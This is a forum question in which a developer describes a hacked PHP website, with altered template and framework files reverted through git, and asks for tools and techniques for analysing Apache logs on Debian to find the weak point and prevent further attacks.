How to analyse logs after the site was hacked
- by Vasiliy Toporov
One of our web-projects was hacked. Malefactor changed some template files in project and 1 core file of the web-framework (it's one of the famous php-frameworks).
We found all corrupted files by git and reverted them. So now I need to find the weak point.
With high probability we can say, that it's not the ftp or ssh password abduction. The support specialist of hosting provider (after logs analysis) said that it was the security hole in our code.
My questions:
1) What tools should I use, to review access and error logs of Apache? (Our server distro is Debian).
2) Can you write tips of suspicious lines detection in logs? Maybe tutorials or primers of some useful regexps or techniques?
3) How to separate "normal user behavior" from suspicious in logs.
4) Is there any way to preventing attacks in Apache?
Thanks for your help.